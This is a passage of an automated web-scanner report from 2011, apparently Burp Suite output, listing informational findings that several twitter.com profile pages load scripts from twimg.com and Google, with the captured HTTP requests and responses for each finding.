<script src="http://a2.twimg.com/a/1296245718/javascripts/dismissable.js?1296246715" type="text/javascript"></script>
...[SNIP]...

18.401. http://twitter.com/benmezrich previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/benmezrich

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247836
http://a1.twimg.com/a/1296245718/javascripts/api.js?1296247836
http://a1.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247836
http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247836
http://a2.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247836
http://a3.twimg.com/a/1296245718/javascripts/dismissable.js?1296247836
http://a3.twimg.com/a/1296245718/javascripts/twitter.js?1296247836
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265970-66900-52833
ETag: "c5b0a06ada9d5c4864087cf3c0c522b7"
Last-Modified: Sat, 29 Jan 2011 01:52:50 GMT
X-Runtime: 0.01562
Content-Type: text/html; charset=utf-8
Content-Length: 50003
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/twitter.js?1296247836" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247836" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247836" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247836" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247836" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/api.js?1296247836" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247836" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/dismissable.js?1296247836" type="text/javascript"></script>
...[SNIP]...

18.402. http://twitter.com/bennadel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/bennadel

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /bennadel HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:30 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225029-56076-61608
ETag: "241ca6186e49f64c12f595a689635dc8"
Last-Modified: Fri, 28 Jan 2011 14:30:29 GMT
X-Runtime: 0.64571
Content-Type: text/html; charset=utf-8
Content-Length: 49758
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIiBodHRwOi8vdHdpdHRlci5jb20vYmVubmFkZWw6%250ADGNzcmZfaWQiJTEyNDM3NmU5Zjg3ODYwNmJiMWM2YjQ0MzhhNmM0NTM5Og9j%250AcmVhdGVkX2F0bCsIM07wzC0BOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBjNzRh%250AZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNo%250AOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--d2adbee25df14d0172349a6c3fd5e58e45975083; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.403. http://twitter.com/bennadel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/bennadel

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /bennadel HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:10:55 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234655-24204-44916
ETag: "5aae09f52cc65ab250f4b67cc7e38a81"
Last-Modified: Fri, 28 Jan 2011 17:10:55 GMT
X-Runtime: 0.00814
Content-Type: text/html; charset=utf-8
Content-Length: 49874
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.404. http://twitter.com/bennadel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/bennadel

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /bennadel HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:42 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225162-25295-16708
ETag: "d9efc82cb1206978f8253152c54f3965"
Last-Modified: Fri, 28 Jan 2011 14:32:42 GMT
X-Runtime: 0.56952
Content-Type: text/html; charset=utf-8
Content-Length: 49771
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIiBodHRwOi8vdHdpdHRlci5jb20vYmVubmFkZWw6%250ADGNzcmZfaWQiJWJlMzg1YWQ0YjQzNzUzOTA0MTE2MTJhMjkxZjZjYmZmOgdp%250AZCIlMWM5NTM0ODFhNDJmZGU5YzBjNzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2Vk%250AewA6D2NyZWF0ZWRfYXRsKwgzTvDMLQE%253D--01db1049138c566b03ae42ff19e8991c9f58be62; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.405. http://twitter.com/bostonherald previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/bostonherald

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415
http://a1.twimg.com/a/1296245718/javascripts/dismissable.js?1296248415
http://a1.twimg.com/a/1296245718/javascripts/geov1.js?1296248415
http://a1.twimg.com/a/1296245718/javascripts/twitter.js?1296248415
http://a3.twimg.com/a/1296245718/javascripts/api.js?1296248415
http://a3.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296248415
http://a3.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296248415
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:20 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265280-17400-32279
ETag: "e1a9ca3ce3850d33d8312521c7367bdc"
Last-Modified: Sat, 29 Jan 2011 01:41:20 GMT
X-Runtime: 0.00787
Content-Type: text/html; charset=utf-8
Content-Length: 38696
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/twitter.js?1296248415" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296248415" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296248415" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/geov1.js?1296248415" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/api.js?1296248415" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/dismissable.js?1296248415" type="text/javascript"></script>
...[SNIP]...

18.406. http://twitter.com/cjronson previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/cjronson

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247836
http://a1.twimg.com/a/1296245718/javascripts/api.js?1296247836
http://a1.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247836
http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247836
http://a2.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247836
http://a3.twimg.com/a/1296245718/javascripts/dismissable.js?1296247836
http://a3.twimg.com/a/1296245718/javascripts/twitter.js?1296247836
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:54:02 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266042-1314-53197
ETag: "57db21f7394d7e31ecaad1a1f749d095"
Last-Modified: Sat, 29 Jan 2011 01:54:02 GMT
X-Runtime: 0.01554
Content-Type: text/html; charset=utf-8
Content-Length: 51916
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/twitter.js?1296247836" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247836" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247836" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247836" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247836" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/api.js?1296247836" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247836" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/dismissable.js?1296247836" type="text/javascript"></script>
...[SNIP]...

18.407. http://twitter.com/cowboy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/cowboy

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296173346/javascripts/geov1.js?1296177106
http://a1.twimg.com/a/1296173346/javascripts/api.js?1296177106
http://a1.twimg.com/a/1296173346/javascripts/lib/gears_init.js?1296177106
http://a2.twimg.com/a/1296173346/javascripts/lib/jquery.tipsy.min.js?1296177106
http://a2.twimg.com/a/1296173346/javascripts/lib/mustache.js?1296177106
http://a3.twimg.com/a/1296173346/javascripts/dismissable.js?1296177106
http://a3.twimg.com/a/1296173346/javascripts/twitter.js?1296177106
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:00 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225060-85333-1036
ETag: "257ca8de3359b561c58908e572d9840c"
Last-Modified: Fri, 28 Jan 2011 14:31:00 GMT
X-Runtime: 0.01434
Content-Type: text/html; charset=utf-8
Content-Length: 52646
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296173346/javascripts/twitter.js?1296177106" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296173346/javascripts/lib/jquery.tipsy.min.js?1296177106" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296173346/javascripts/lib/gears_init.js?1296177106" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296173346/javascripts/lib/mustache.js?1296177106" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296173346/javascripts/geov1.js?1296177106" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296173346/javascripts/api.js?1296177106" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296173346/javascripts/lib/mustache.js?1296177106" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296173346/javascripts/dismissable.js?1296177106" type="text/javascript"></script>
...[SNIP]...

18.408. http://twitter.com/creationix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/creationix

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:38 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225038-68082-17773
ETag: "b84f4f9cc8d7f0be4a449ccb6ba5ef8c"
Last-Modified: Fri, 28 Jan 2011 14:30:38 GMT
X-Runtime: 0.01145
Content-Type: text/html; charset=utf-8
Content-Length: 52514
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
